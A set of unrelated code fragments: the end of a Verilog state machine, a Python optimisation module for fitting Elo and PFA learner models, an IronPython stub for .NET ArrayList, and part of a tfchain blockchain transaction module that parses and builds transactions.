th_myfunc_7 <= th_myfunc_7_15;
end
th_myfunc_7_15: begin
_th_myfunc_7_i_40 <= 0;
th_myfunc_7 <= th_myfunc_7_16;
end
th_myfunc_7_16: begin
if(_th_myfunc_7_i_40 < 20) begin
th_myfunc_7 <= th_myfunc_7_17;
end else begin
th_myfunc_7 <= th_myfunc_7_18;
end
end
th_myfunc_7_17: begin
_th_myfunc_7_i_40 <= _th_myfunc_7_i_40 + 1;
th_myfunc_7 <= th_myfunc_7_16;
end
th_myfunc_7_18: begin
$display("Thread %d Hello", _th_myfunc_7_tid_37);
th_myfunc_7 | |
# -*- coding: utf-8 -*-
"""
Optimization Methods
====================
"""
from __future__ import division
import itertools
from collections import defaultdict
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from scipy import optimize
from . import tools
from .tests import PerformanceTest, get_train_result
from .models import (EloModel, PFAExt, PFAExtSpacing, PFAExtStaircase,
PFAGong, PFAModel, PFAGongTiming)
class GridResult(object):
    """Represents a GRID search result.

    :param grid: A matrix representing the results of the search.
    :type grid: :class:`numpy.matrix`
    :param xlabel: Name of the x-axis.
    :type xlabel: str
    :param ylabel: Name of the y-axis.
    :type ylabel: str
    :param xvalues: Values on the x-axis.
    :type xvalues: list
    :param yvalues: Values on the y-axis.
    :type yvalues: list
    """

    def __init__(self, grid,
                 xlabel=None, ylabel=None,
                 xvalues=None, yvalues=None):
        self.grid = grid
        self.xlabel = xlabel
        self.ylabel = ylabel
        self.xvalues = xvalues
        self.yvalues = yvalues
        # imshow extent: [left, right, bottom, top]; the y pair is given
        # max-first so the y-axis matches row order of the grid.
        self.extent = np.array([
            min(self.xvalues), max(self.xvalues),
            max(self.yvalues), min(self.yvalues),
        ])

    @tools.cached_property
    def rmse(self):
        """Grid Search errors estimations using RMSE."""
        return np.array([
            [result.rmse for result in row] for row in self.grid
        ])

    @tools.cached_property
    def auc(self):
        """Grid Search errors estimations using AUC."""
        return np.array([
            [result.auc for result in row] for row in self.grid
        ])

    @tools.cached_property
    def off(self):
        """Grid Search errors estimations using the average of
        ``predicted - observerd``.
        """
        return np.array([
            [result.off for result in row] for row in self.grid
        ])

    @tools.cached_property
    def rmse_best(self):
        """Values of `xvalues` and `yvalues` with best (lowest) RMSE."""
        minimum = np.unravel_index(self.rmse.argmin(), self.rmse.shape)
        return np.array([self.xvalues[minimum[1]], self.yvalues[minimum[0]]])

    @tools.cached_property
    def auc_best(self):
        """Values of `xvalues` and `yvalues` with best (highest) AUC."""
        maximum = np.unravel_index(self.auc.argmax(), self.auc.shape)
        return np.array([self.xvalues[maximum[1]], self.yvalues[maximum[0]]])

    def _plot_grid(self, grid, **img_kwargs):
        """Plots the result of the GRID search.

        Uses :func:`~matplotlib.pyplot.imshow` to plot the data.

        :param grid: The grid to plot.
        :type grid: list of lists or :class:`numpy.matrix`.
        :param **img_kwargs: Key-word arguments passed to the
            :func:`~matplotlib.pyplot.imshow`.
        """
        img_kwargs.setdefault('cmap', cm.Greys)
        img_kwargs.setdefault('interpolation', 'nearest')
        img_kwargs.setdefault('extent', self.extent)
        img_kwargs.setdefault('aspect', 'auto')

        # Non-imshow options are popped so imshow never sees them.
        img_title = img_kwargs.pop('title', 'Grid Search')
        img_xlabel = img_kwargs.pop('xlabel', self.xlabel)
        img_ylabel = img_kwargs.pop('ylabel', self.ylabel)

        plot = plt.imshow(grid, **img_kwargs)
        plt.colorbar(plot)
        plt.xlabel(img_xlabel)
        plt.ylabel(img_ylabel)
        plt.title(img_title)
        plt.show()
        return plot

    def plot_rmse(self, **img_kwargs):
        """Plots the RMSE grid of the GRID search.

        :param **img_kwargs: Key-word arguments passed to the
            :func:`~matplotlib.pyplot.imshow`.
        """
        img_kwargs.setdefault('title', 'Grid Search, metric: RMSE')
        # Reversed colormap so that *low* (good) RMSE shows dark.
        img_kwargs.setdefault('cmap', cm.Greys_r)
        return self._plot_grid(self.rmse, **img_kwargs)

    def plot_auc(self, **img_kwargs):
        """Plots the AUC grid of the GRID search.

        :param **img_kwargs: Key-word arguments passed to the
            :func:`~matplotlib.pyplot.imshow`.
        """
        img_kwargs.setdefault('title', 'Grid Search, metric: AUC')
        return self._plot_grid(self.auc, **img_kwargs)

    def plot_off(self, **img_kwargs):
        """Plots the (observed - predicted) grid of the GRID search.

        :param **img_kwargs: Key-word arguments passed to the
            :func:`~matplotlib.pyplot.imshow`.
        """
        img_kwargs.setdefault('title',
                              'Grid Search, metric: observed - predicted')
        return self._plot_grid(self.off, **img_kwargs)

    def plot(self):
        """Plots the RMSE and AUC grids side by side."""
        plt.figure(1)
        plt.subplot(121)
        plot1 = self.plot_rmse()
        plt.subplot(122)
        plot2 = self.plot_auc()
        return [plot1, plot2]

    def __str__(self):
        return self.__repr__()

    def __repr__(self):
        # BUG FIX: previously referenced non-existent ``rmse_min`` and
        # ``auc_min`` attributes, so repr() raised AttributeError. The
        # best-value properties are ``rmse_best``/``auc_best`` (AUC is
        # maximized, so "min" was also the wrong label).
        return (
            'RMSE:\n best: {0}\n {1}'
            '\n\n'
            'AUC:\n best: {2}\n {3}'
        ).format(
            self.rmse_best.round(3),
            self.rmse.round(3),
            self.auc_best.round(3),
            self.auc.round(3),
        )
class DescentResult(object):
"""Representation of the result of NaiveDescent."""
def __init__(self, params, grads):
self.params = pd.DataFrame(params)
self.grads = pd.Series(grads)
self.iterations = len(self.grads)
@property
def best(self):
"""The best fitted parameters."""
return self.params.iloc[-1]
def __str__(self):
return self.__repr__()
def __repr__(self):
return (
'Iterations: {}\n'
'Best:\n{}'
).format(
self.iterations,
self.best.round(3),
)
class GradientResult(object):
"""Representation of the result of GradientDescent."""
def __init__(self, model, parameters):
self.model = model
self.parameters = parameters
self.iterations = range(len(parameters))
self.deltas = [params['delta'] for params in self.parameters]
self.gammas = [params['gamma'] for params in self.parameters]
self.staircases = [params['staircase'] for params in self.parameters]
self.intervals = list(sorted(i for i in self.staircases[-1]))
@property
def best(self):
"""The best fitted parameters."""
return {
'gamma': self.gammas[-1],
'delta': self.deltas[-1],
'staircase': self.staircases[-1],
}
def plot(self, **kwargs):
"""Plots the result of the gradient descent.
Uses :func:`~matplotlib.pyplot.plot` to plot the data.
:param **kwargs: Key-word arguments passed to the
:func:`~matplotlib.pyplot.plot`.
"""
results = sorted(self.staircases[-1].items(), key=lambda x: x[0])
staircase_times = self.model.metadata['staircase_times']
x_axis = [np.mean(staircase_times[i]) for i in self.intervals]
y_axis = [value for interval, value in results]
xlabel = kwargs.pop('xlabel', 'Time from previous attempt in seconds.')
ylabel = kwargs.pop('ylabel', 'Memory activation')
title = kwargs.pop('title', '')
plot = plt.plot(x_axis, y_axis, '.-', **kwargs)
plt.xscale('log')
plt.title(title)
plt.xlabel(xlabel)
plt.ylabel(ylabel)
return plot
def format_staircases(self, indexes=None):
"""Formats staircase function in a readable way.
:param indexes: Staircases to show (referenced by the index).
`[-1]` formats only the last staircase values. By default,
all staircase values are formated.
"""
indexes = indexes or self.iterations
staircases = [self.staircases[i] for i in indexes]
ranges = sorted([x[1] for x in staircases[0]])
head = ('{:9.0f}' * len(staircases[0])).format(*ranges)
body = ''
for staircase in staircases:
stair = list(sorted(staircase.items(), key=lambda x: x[0]))
body += ('{:+9.3f}' * len(stair)).format(*[v for k, v in stair])
body += '\n'
return '{}\n{}'.format(head, body)
def __repr__(self):
return (
'Iterations: {0}\n'
'Gamma: {1:.5f}\n'
'Delta: {2:.5f}\n'
'Staircase:\n{3}'
).format(
len(self.iterations)-1,
self.best['gamma'],
self.best['delta'],
self.format_staircases([-1])
)
class GridSearch(object):
"""Encapsulates GRID searches for various models.
:param data: Data with answers in a DataFrame.
"""
def __init__(self, data):
self.data = data
def search(self, factory, xvalues, yvalues, **result_kwargs):
"""Performes grid search on ELO model using given parameters.
:param factory: Model facotry which is used to instantiate
model with all the combinations of `xvalues` and `yvalues`.
:type factory: callable
:param xvalues: List of values for first positional argument
passed on to the model factory.
:type xvalues: iterable
:param yvalues: List of values for second positional argument
passed on to the model factory.
:type yvalues: iterable
:param **result_kwargs: Optional arguments passed on to
the :class:`GridResult` instance.
"""
m, n = len(xvalues), len(yvalues)
grid = np.array([[None] * m] * n)
for x, y in itertools.product(range(m), range(n)):
model = factory(xvalues[x], yvalues[y])
test = PerformanceTest(model, self.data)
test.run()
grid[y, x] = test.results['train']
tools.echo('{}/{} {}/{}'.format(x+1, m, y+1, n))
return GridResult(
grid=grid,
xvalues=xvalues,
yvalues=yvalues,
**result_kwargs
)
def search_elo(self, alphas, betas):
"""Performes grid search on ELO model using given parameters.
:param alphas: Alpha parameters (see :class:`EloModel`).
:type alphas: list or :class:`numpy.array`
:param betas: Beta paramters (see :class:`EloModel`).
:type betas: list or :class:`numpy.array`
"""
def elo_factory(x, y):
return EloModel(alpha=x, beta=y)
return self.search(
factory=elo_factory,
xvalues=alphas,
yvalues=betas,
xlabel='alpha',
ylabel='beta',
)
def search_pfae(self, gammas, deltas):
"""Performes grid search on PFA extended model using given parameters.
:param gammas: Gamma parameters (see :class:`PFAExt`).
:type gammas: list or :class:`numpy.array`
:param deltas: Delta paramters (see :class:`PFAExt`).
:type deltas: list or :class:`numpy.array`
"""
def pfae_factory(x, y):
elo = EloModel()
return PFAExt(elo, gamma=x, delta=y)
return self.search(
factory=pfae_factory,
xvalues=gammas,
yvalues=deltas,
xlabel='gammas',
ylabel='deltas',
)
def search_pfas(self, decays, spacings):
"""Performes grid search on PFA extended with spacing and forgetting
using given parameters.
:param decays: Decay rates (see :class:`PFAExtSpacing`).
:type decays: list or :class:`numpy.array`
:param spacings: Spacing rates (see :class:`PFAExtSpacing`).
:type spacings: list or :class:`numpy.array`
"""
def pfas_factory(x, y):
elo = EloModel()
return PFAExtSpacing(elo, decay_rate=x, spacing_rate=y)
return self.search(
factory=pfas_factory,
xvalues=decays,
yvalues=spacings,
xlabel='decay rates',
ylabel='spacing rates',
)
class RandomSearch(object):
"""Encapsulates random searches for various models.
:param data: Data with answers in a DataFrame.
"""
def __init__(self, data):
self.data = data
def search_elo(self, alpha, beta):
"""Performes random search on ELO model using given initial
parameters.
:param alpha: Initial alpha value (see :class:`EloModel`).
:type alpha: float
:param beta: Initial beta value (see :class:`EloModel`).
:type beta: float
"""
def fun(x):
elo = EloModel(alpha=x[0], beta=x[1])
test = PerformanceTest(elo, self.data)
test.run()
tools.echo('alpha={x[0]} beta={x[1]}'.format(x=x))
return test.results['train'].rmse
return optimize.minimize(fun, [alpha, beta])
def search_pfae(self, gamma, delta):
"""Performes random search on ELO model using given initial
parameters.
:param gamma: Initial gamma value (see :class:`PFAExt`).
:type gamma: float
:param delta: Initial delta value (see :class:`PFAExt`).
:type delta: float
"""
elo = EloModel()
def fun(x):
pfae = PFAExt(elo, gamma=x[0], delta=x[1])
test = PerformanceTest(pfae, self.data)
test.run()
tools.echo('gamma={x[0]} delta={x[1]}'.format(x=x))
return test.results['train'].rmse
return optimize.minimize(fun, [gamma, delta])
class NaiveDescent(object):
"""Encapsulates the modified gradient descent (which is not in fact
based on the partial derivatives of a function) for various models.
Note that this method doesn't really work even when the number of
parameters is very small (like two parameters small).
:param data: Data with answers in a DataFrame.
"""
def __init__(self, data):
self.data = data
def search(self, model_fun, parameters,
step_size=1, precision=0.01, maxiter=50):
"""Finds optimal parameters for given model.
:param model_fun: Callable that trains the model on the given
parameters.
:param | |
<gh_stars>0
# encoding: utf-8
# module System.Collections calls itself Collections
# from mscorlib,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089
# by generator 1.145
# no doc
# no important
# no functions
# classes
class ArrayList(object):
"""
Implements the System.Collections.IList interface using an array whose size is dynamically increased as required.
ArrayList()
ArrayList(capacity: int)
ArrayList(c: ICollection)
"""
def ZZZ(self):
"""hardcoded/mock instance of the class"""
return ArrayList()
instance=ZZZ()
"""hardcoded/returns an instance of the class"""
@staticmethod
def Adapter(list):
"""
Adapter(list: IList) -> ArrayList
Creates an System.Collections.ArrayList wrapper for a specific System.Collections.IList.
list: The System.Collections.IList to wrap.
Returns: The System.Collections.ArrayList wrapper around the System.Collections.IList.
"""
pass
def Add(self,value):
"""
Add(self: ArrayList,value: object) -> int
Adds an object to the end of the System.Collections.ArrayList.
value: The System.Object to be added to the end of the System.Collections.ArrayList. The value can be null.
Returns: The System.Collections.ArrayList index at which the value has been added.
"""
pass
def AddRange(self,c):
"""
AddRange(self: ArrayList,c: ICollection)
Adds the elements of an System.Collections.ICollection to the end of the System.Collections.ArrayList.
c: The System.Collections.ICollection whose elements should be added to the end of the System.Collections.ArrayList. The collection itself cannot be null,but it can contain
elements that are null.
"""
pass
def BinarySearch(self,*__args):
"""
BinarySearch(self: ArrayList,index: int,count: int,value: object,comparer: IComparer) -> int
Searches a range of elements in the sorted System.Collections.ArrayList for an element using the specified comparer and returns the zero-based index of the element.
index: The zero-based starting index of the range to search.
count: The length of the range to search.
value: The System.Object to locate. The value can be null.
comparer: The System.Collections.IComparer implementation to use when comparing elements.-or- null to use the default comparer that is the System.IComparable implementation of each
element.
Returns: The zero-based index of value in the sorted System.Collections.ArrayList,if value is found; otherwise,a negative number,which is the bitwise complement of the index of
the next element that is larger than value or,if there is no larger element,the bitwise complement of System.Collections.ArrayList.Count.
BinarySearch(self: ArrayList,value: object) -> int
Searches the entire sorted System.Collections.ArrayList for an element using the default comparer and returns the zero-based index of the element.
value: The System.Object to locate. The value can be null.
Returns: The zero-based index of value in the sorted System.Collections.ArrayList,if value is found; otherwise,a negative number,which is the bitwise complement of the index of
the next element that is larger than value or,if there is no larger element,the bitwise complement of System.Collections.ArrayList.Count.
BinarySearch(self: ArrayList,value: object,comparer: IComparer) -> int
Searches the entire sorted System.Collections.ArrayList for an element using the specified comparer and returns the zero-based index of the element.
value: The System.Object to locate. The value can be null.
comparer: The System.Collections.IComparer implementation to use when comparing elements.-or- null to use the default comparer that is the System.IComparable implementation of each
element.
Returns: The zero-based index of value in the sorted System.Collections.ArrayList,if value is found; otherwise,a negative number,which is the bitwise complement of the index of
the next element that is larger than value or,if there is no larger element,the bitwise complement of System.Collections.ArrayList.Count.
"""
pass
def Clear(self):
"""
Clear(self: ArrayList)
Removes all elements from the System.Collections.ArrayList.
"""
pass
def Clone(self):
"""
Clone(self: ArrayList) -> object
Creates a shallow copy of the System.Collections.ArrayList.
Returns: A shallow copy of the System.Collections.ArrayList.
"""
pass
def Contains(self,item):
"""
Contains(self: ArrayList,item: object) -> bool
Determines whether an element is in the System.Collections.ArrayList.
item: The System.Object to locate in the System.Collections.ArrayList. The value can be null.
Returns: true if item is found in the System.Collections.ArrayList; otherwise,false.
"""
pass
def CopyTo(self,*__args):
"""
CopyTo(self: ArrayList,array: Array)
Copies the entire System.Collections.ArrayList to a compatible one-dimensional System.Array,starting at the beginning of the target array.
array: The one-dimensional System.Array that is the destination of the elements copied from System.Collections.ArrayList. The System.Array must have zero-based indexing.
CopyTo(self: ArrayList,array: Array,arrayIndex: int)
Copies the entire System.Collections.ArrayList to a compatible one-dimensional System.Array,starting at the specified index of the target array.
array: The one-dimensional System.Array that is the destination of the elements copied from System.Collections.ArrayList. The System.Array must have zero-based indexing.
arrayIndex: The zero-based index in array at which copying begins.
CopyTo(self: ArrayList,index: int,array: Array,arrayIndex: int,count: int)
Copies a range of elements from the System.Collections.ArrayList to a compatible one-dimensional System.Array,starting at the specified index of the target array.
index: The zero-based index in the source System.Collections.ArrayList at which copying begins.
array: The one-dimensional System.Array that is the destination of the elements copied from System.Collections.ArrayList. The System.Array must have zero-based indexing.
arrayIndex: The zero-based index in array at which copying begins.
count: The number of elements to copy.
"""
pass
@staticmethod
def FixedSize(list):
"""
FixedSize(list: IList) -> IList
Returns an System.Collections.IList wrapper with a fixed size.
list: The System.Collections.IList to wrap.
Returns: An System.Collections.IList wrapper with a fixed size.
FixedSize(list: ArrayList) -> ArrayList
Returns an System.Collections.ArrayList wrapper with a fixed size.
list: The System.Collections.ArrayList to wrap.
Returns: An System.Collections.ArrayList wrapper with a fixed size.
"""
pass
def GetEnumerator(self,index=None,count=None):
"""
GetEnumerator(self: ArrayList) -> IEnumerator
Returns an enumerator for the entire System.Collections.ArrayList.
Returns: An System.Collections.IEnumerator for the entire System.Collections.ArrayList.
GetEnumerator(self: ArrayList,index: int,count: int) -> IEnumerator
Returns an enumerator for a range of elements in the System.Collections.ArrayList.
index: The zero-based starting index of the System.Collections.ArrayList section that the enumerator should refer to.
count: The number of elements in the System.Collections.ArrayList section that the enumerator should refer to.
Returns: An System.Collections.IEnumerator for the specified range of elements in the System.Collections.ArrayList.
"""
pass
def GetRange(self,index,count):
"""
GetRange(self: ArrayList,index: int,count: int) -> ArrayList
Returns an System.Collections.ArrayList which represents a subset of the elements in the source System.Collections.ArrayList.
index: The zero-based System.Collections.ArrayList index at which the range starts.
count: The number of elements in the range.
Returns: An System.Collections.ArrayList which represents a subset of the elements in the source System.Collections.ArrayList.
"""
pass
def IndexOf(self,value,startIndex=None,count=None):
"""
IndexOf(self: ArrayList,value: object) -> int
Searches for the specified System.Object and returns the zero-based index of the first occurrence within the entire System.Collections.ArrayList.
value: The System.Object to locate in the System.Collections.ArrayList. The value can be null.
Returns: The zero-based index of the first occurrence of value within the entire System.Collections.ArrayList,if found; otherwise,-1.
IndexOf(self: ArrayList,value: object,startIndex: int) -> int
Searches for the specified System.Object and returns the zero-based index of the first occurrence within the range of elements in the System.Collections.ArrayList that
extends from the specified index to the last element.
value: The System.Object to locate in the System.Collections.ArrayList. The value can be null.
startIndex: The zero-based starting index of the search. 0 (zero) is valid in an empty list.
Returns: The zero-based index of the first occurrence of value within the range of elements in the System.Collections.ArrayList that extends from startIndex to the last element,if
found; otherwise,-1.
IndexOf(self: ArrayList,value: object,startIndex: int,count: int) -> int
Searches for the specified System.Object and returns the zero-based index of the first occurrence within the range of elements in the System.Collections.ArrayList that
starts at the specified index and contains the specified number of elements.
value: The System.Object to locate in the System.Collections.ArrayList. The value can be null.
startIndex: The zero-based starting index of the search. 0 (zero) is valid in an empty list.
count: The number of elements in the section to search.
Returns: The zero-based index of the first occurrence of value within the range of elements in the System.Collections.ArrayList that starts at startIndex and contains count number
of elements,if found; otherwise,-1.
"""
pass
def Insert(self,index,value):
"""
Insert(self: ArrayList,index: int,value: object)
Inserts an element into the System.Collections.ArrayList at the specified index.
index: The zero-based index at which value should be inserted.
value: The System.Object to insert. The | |
"""
Module contianing all transaction types
"""
from JumpscaleLib.clients.blockchain.rivine.types.signatures import Ed25519PublicKey
from JumpscaleLib.clients.blockchain.rivine.types.unlockconditions import SingleSignatureFulfillment, UnlockHashCondition,\
LockTimeCondition, AtomicSwapCondition, AtomicSwapFulfillment, MultiSignatureCondition, FulfillmentFactory, UnlockCondtionFactory, MultiSignatureFulfillment
from JumpscaleLib.clients.blockchain.rivine.encoding import binary
from JumpscaleLib.clients.blockchain.rivine.utils import hash
from JumpscaleLib.clients.blockchain.rivine.types.unlockhash import UnlockHash
from JumpscaleLib.clients.blockchain.rivine.secrets import token_bytes
from JumpscaleLib.clients.blockchain.rivine.const import HASTINGS_TFT_VALUE
from JumpscaleLib.clients.blockchain.tfchain.encoding import binary as tfbinary
from JumpscaleLib.clients.blockchain.tfchain.types import network as tftnet
from JumpscaleLib.clients.blockchain.tfchain.types import signatures as tftsig
from JumpscaleLib.clients.blockchain.tfchain import const as tfconst
from enum import Enum
import base64
import json
LEGACY_TRANSACTION_VERSION = 0
DEFAULT_TRANSACTION_VERSION = 1
MINTERDEFINITION_TRANSACTION_VERSION = 128
COINCREATION_TRANSACTION_VERSION = 129
BOT_REGISTRATION_TRANSACTION_VERSION = 144
BOT_RECORD_UPDATE_TRANSACTION_VERSION = 145
BOT_NAME_TRANSFER_TRANSACTION_VERSION = 146
ERC20_CONVERSION_TRANSACTION_VERSION = 208
ERC20_COIN_CREATION_TRANSACTION_VERSION = 209
ERC20_ADDRESS_REGISTRATION_TRANSACTION_VERSION = 210
HASHTYPE_COINOUTPUT_ID = 'coinoutputid'
DEFAULT_MINERFEE = 100000000
class TransactionFactory:
"""
A transaction factory class
"""
@staticmethod
def create_transaction(version):
"""
Creates and return a transaction of the speicfied verion
@param version: Version of the transaction
"""
if version == 1:
return TransactionV1()
@staticmethod
def from_json(txn_json):
"""
Creates a new transaction object from a json formated string
@param txn_json: JSON string, representing a transaction
"""
txn_dict = json.loads(txn_json)
return TransactionFactory.from_dict(txn_dict)
@staticmethod
def from_dict(txn_dict):
"""
Creates a new transaction object from a raw (JSON-decoded) dict.
@param from_dict: dictionary, representing a raw transaction, as decoded from a JSON object.
"""
if 'version' not in txn_dict:
return None
if txn_dict['version'] == DEFAULT_TRANSACTION_VERSION:
if 'data' not in txn_dict:
raise ValueError("no data object found in Default Transaction (v{})".format(DEFAULT_TRANSACTION_VERSION))
txn = TransactionV1()
txn_data = txn_dict['data']
if 'coininputs' in txn_data:
for ci_info in (txn_data['coininputs'] or []):
ci = CoinInput.from_dict(ci_info)
txn._coin_inputs.append(ci)
if 'coinoutputs' in txn_data:
for co_info in (txn_data['coinoutputs'] or []):
co = CoinOutput.from_dict(co_info)
txn._coin_outputs.append(co)
if 'minerfees' in txn_data:
for minerfee in (txn_data['minerfees'] or []) :
txn.add_minerfee(int(minerfee))
if 'arbitrarydata' in txn_data:
txn._data = base64.b64decode(txn_data['arbitrarydata'])
return txn
if txn_dict['version'] == LEGACY_TRANSACTION_VERSION:
if 'data' not in txn_dict:
raise ValueError("no data object found in Legacy Transaction (v{})".format(LEGACY_TRANSACTION_VERSION))
txn = TransactionV1() # parse as v1 transaction, converting the coin inputs and outputs
txn_data = txn_dict['data']
if 'coininputs' in txn_data:
for legacy_ci_info in (txn_data['coininputs'] or []):
unlocker = legacy_ci_info.get('unlocker', {})
ci_info = {
'parentid': legacy_ci_info.get('parentid', ''),
'fulfillment': {
'type': 1, # TODO: support legacy atomic swap fulfillments
'data': {
'publickey': unlocker.get('condition', {}).get('publickey'),
'signature': unlocker.get('fulfillment', {}).get('signature'),
}
}
}
ci = CoinInput.from_dict(ci_info)
txn._coin_inputs.append(ci)
if 'coinoutputs' in txn_data:
for legacy_co_info in (txn_data['coinoutputs'] or []):
co_info = {
'value': legacy_co_info.get('value', '0'),
'condition': {
'type': 1, # TODO: support legacy atomic swap conditions
'data': {
'unlockhash': legacy_co_info.get('unlockhash', ''),
}
}
}
co = CoinOutput.from_dict(co_info)
txn._coin_outputs.append(co)
if 'minerfees' in txn_data:
for minerfee in (txn_data['minerfees'] or []) :
txn.add_minerfee(int(minerfee))
if 'arbitrarydata' in txn_data:
txn._data = base64.b64decode(txn_data['arbitrarydata'])
return txn
if txn_dict['version'] == MINTERDEFINITION_TRANSACTION_VERSION:
if 'data' not in txn_dict:
raise ValueError("no data object found in MinterDefinition Transaction")
txn = TransactionV128()
txn_data = txn_dict['data']
if 'nonce' in txn_data:
txn._nonce = base64.b64decode(txn_data['nonce'])
if 'mintcondition' in txn_data:
txn._mint_condition = UnlockCondtionFactory.from_dict(txn_data['mintcondition'])
if 'mintfulfillment' in txn_data:
txn._mint_fulfillment = FulfillmentFactory.from_dict(txn_data['mintfulfillment'])
if 'minerfees' in txn_data:
for minerfee in txn_data['minerfees']:
txn.add_minerfee(int(minerfee))
if 'arbitrarydata' in txn_data:
txn._data = base64.b64decode(txn_data['arbitrarydata'])
return txn
if txn_dict['version'] == COINCREATION_TRANSACTION_VERSION:
if 'data' not in txn_dict:
raise ValueError("no data object found in CoinCreation Transaction")
txn = TransactionV129()
txn_data = txn_dict['data']
if 'nonce' in txn_data:
txn._nonce = base64.b64decode(txn_data['nonce'])
if 'mintfulfillment' in txn_data:
txn._mint_fulfillment = FulfillmentFactory.from_dict(txn_data['mintfulfillment'])
if 'coinoutputs' in txn_data:
for co_info in txn_data['coinoutputs']:
co = CoinOutput.from_dict(co_info)
txn._coin_outputs.append(co)
if 'minerfees' in txn_data:
for minerfee in txn_data['minerfees']:
txn.add_minerfee(int(minerfee))
if 'arbitrarydata' in txn_data:
txn._data = base64.b64decode(txn_data['arbitrarydata'])
return txn
if txn_dict['version'] == BOT_REGISTRATION_TRANSACTION_VERSION:
if 'data' not in txn_dict:
raise ValueError("no data object found in BotRegistration Transaction")
txn = TransactionV144()
txn.from_dict(txn_dict['data'])
return txn
if txn_dict['version'] == BOT_RECORD_UPDATE_TRANSACTION_VERSION:
if 'data' not in txn_dict:
raise ValueError("no data object found in BotRecordUpdate Transaction")
txn = TransactionV145()
txn.from_dict(txn_dict['data'])
return txn
if txn_dict['version'] == BOT_NAME_TRANSFER_TRANSACTION_VERSION:
if 'data' not in txn_dict:
raise ValueError("no data object found in BotNameTransfer Transaction")
txn = TransactionV146()
txn.from_dict(txn_dict['data'])
return txn
if txn_dict['version'] == ERC20_CONVERSION_TRANSACTION_VERSION:
if 'data' not in txn_dict:
raise ValueError("no data object found in ERC20 Conversion Transaction")
txn = TransactionV208()
txn.from_dict(txn_dict['data'])
return txn
if txn_dict['version'] == ERC20_COIN_CREATION_TRANSACTION_VERSION:
if 'data' not in txn_dict:
raise ValueError("no data object found in ERC20 CoinCreation Transaction")
txn = TransactionV209()
txn.from_dict(txn_dict['data'])
return txn
if txn_dict['version'] == ERC20_ADDRESS_REGISTRATION_TRANSACTION_VERSION:
if 'data' not in txn_dict:
raise ValueError("no data object found in ERC20 AddressRegistration Transaction")
txn = TransactionV210()
txn.from_dict(txn_dict['data'])
return txn
class TransactionV1:
"""
A Transaction is an atomic component of a block. Transactions can contain
inputs and outputs and even arbitrar data. They can also contain signatures to prove that a given party has
approved the transaction, or at least a particular subset of it.
Transactions can depend on other previous transactions in the same block,
but transactions cannot spend outputs that they create or otherwise beself-dependent.
"""
def __init__(self):
"""
Initializes a new tansaction
"""
self._coin_inputs = []
self._blockstakes_inputs = []
self._coin_outputs = []
self._blockstakes_outputs = []
self._minerfees = []
self._data = bytearray()
self._version = bytearray([1])
self._id = None
@property
def version(self):
return 1
@property
def id(self):
"""
Gets transaction id
"""
return self._id
@id.setter
def id(self, txn_id):
"""
Sets transaction id
"""
self._id = txn_id
@property
def coin_inputs(self):
"""
Retrieves coins inputs
"""
return self._coin_inputs or []
@property
def coin_outputs(self):
"""
Retrieves coins outputs
"""
return self._coin_outputs or []
@property
def data(self):
"""
Gets the arbitrary data
"""
return self._data
@property
def json(self):
"""
Returns a json version of the TransactionV1 object
"""
result = {
'version': self.version,
'data': {
'coininputs': [input.json for input in self._coin_inputs],
'coinoutputs': [output.json for output in self._coin_outputs],
'minerfees': [str(fee) for fee in self._minerfees]
}
}
if self._data:
result['data']['arbitrarydata'] = base64.b64encode(self._data).decode('utf-8')
return result
def add_data(self, data):
"""
Add data to the transaction
"""
self._data.extend(data)
def add_coin_input(self, parent_id, pub_key):
"""
Adds a new input to the transaction
"""
key = Ed25519PublicKey(pub_key=pub_key)
fulfillment = SingleSignatureFulfillment(pub_key=key)
self._coin_inputs.append(CoinInput(parent_id=parent_id, fulfillment=fulfillment))
def add_atomicswap_input(self, parent_id, pub_key, secret=None):
"""
Adds a new atomicswap input to the transaction
An atomicswap input can be for refund or redeem purposes, if for refund no secret is needed, but if for redeem then
a secret needs tp be provided
"""
key = Ed25519PublicKey(pub_key=pub_key)
fulfillment = AtomicSwapFulfillment(pub_key=key, secret=secret)
self._coin_inputs.append(CoinInput(parent_id=parent_id, fulfillment=fulfillment))
def add_multisig_input(self, parent_id):
"""
Adds a new coin input with an empty MultiSignatureFulfillment
"""
fulfillment = MultiSignatureFulfillment()
self._coin_inputs.append(CoinInput(parent_id=parent_id, fulfillment=fulfillment))
def add_coin_output(self, value, recipient, locktime=None):
"""
Add a new coin output to the transaction
@param value: Amout of coins
@param recipient: The recipient address
@param locktime: If provided then a locktimecondition will be created for this output
"""
unlockhash = UnlockHash.from_string(recipient)
condition = UnlockHashCondition(unlockhash=unlockhash)
if locktime is not None:
condition = LockTimeCondition(condition=condition, locktime=locktime)
self._coin_outputs.append(CoinOutput(value=value, condition=condition))
def add_atomicswap_output(self, value, recipient, locktime, refund_address, hashed_secret):
"""
Add a new atomicswap output to the transaction
"""
condition = AtomicSwapCondition(sender=refund_address, reciever=recipient,
hashed_secret=hashed_secret, locktime=locktime)
coin_output = CoinOutput(value=value, condition=condition)
self._coin_outputs.append(coin_output)
return coin_output
def add_multisig_output(self, value, unlockhashes, min_nr_sig, locktime=None):
"""
Add a new MultiSignature output to the transaction
@param value: Value of the output in hastings
@param unlockhashes: List of all unlock hashes which are authorised to spend this output by signing off
@param min_nr_sig: Defines the amount of signatures required in order to spend this output
@param locktime: If provided then a locktimecondition will be created for this output
"""
condition = MultiSignatureCondition(unlockhashes=unlockhashes,
min_nr_sig=min_nr_sig)
if locktime is not None:
condition = LockTimeCondition(condition=condition, locktime=locktime)
coin_output = CoinOutput(value=value, condition=condition)
self._coin_outputs.append(coin_output)
return coin_output
def add_minerfee(self, minerfee):
"""
Adds a minerfee to the transaction
"""
self._minerfees.append(minerfee)
def get_input_signature_hash(self, extra_objects=None):
"""
Builds a signature hash for an input
"""
if extra_objects is None:
extra_objects = []
buffer = bytearray()
# encode the transaction version
buffer.extend(self._version)
# encode extra objects if exists
for extra_object in extra_objects:
buffer.extend(binary.encode(extra_object))
# encode the number of coins inputs
buffer.extend(binary.encode(len(self._coin_inputs)))
# encode inputs parent_ids
for coin_input in self._coin_inputs:
buffer.extend(binary.encode(coin_input.parent_id, type_='hex'))
# encode coin outputs
buffer.extend(binary.encode(self._coin_outputs, type_='slice'))
# encode the number of blockstakes
buffer.extend(binary.encode(len(self._blockstakes_inputs)))
# encode blockstack inputs parent_ids
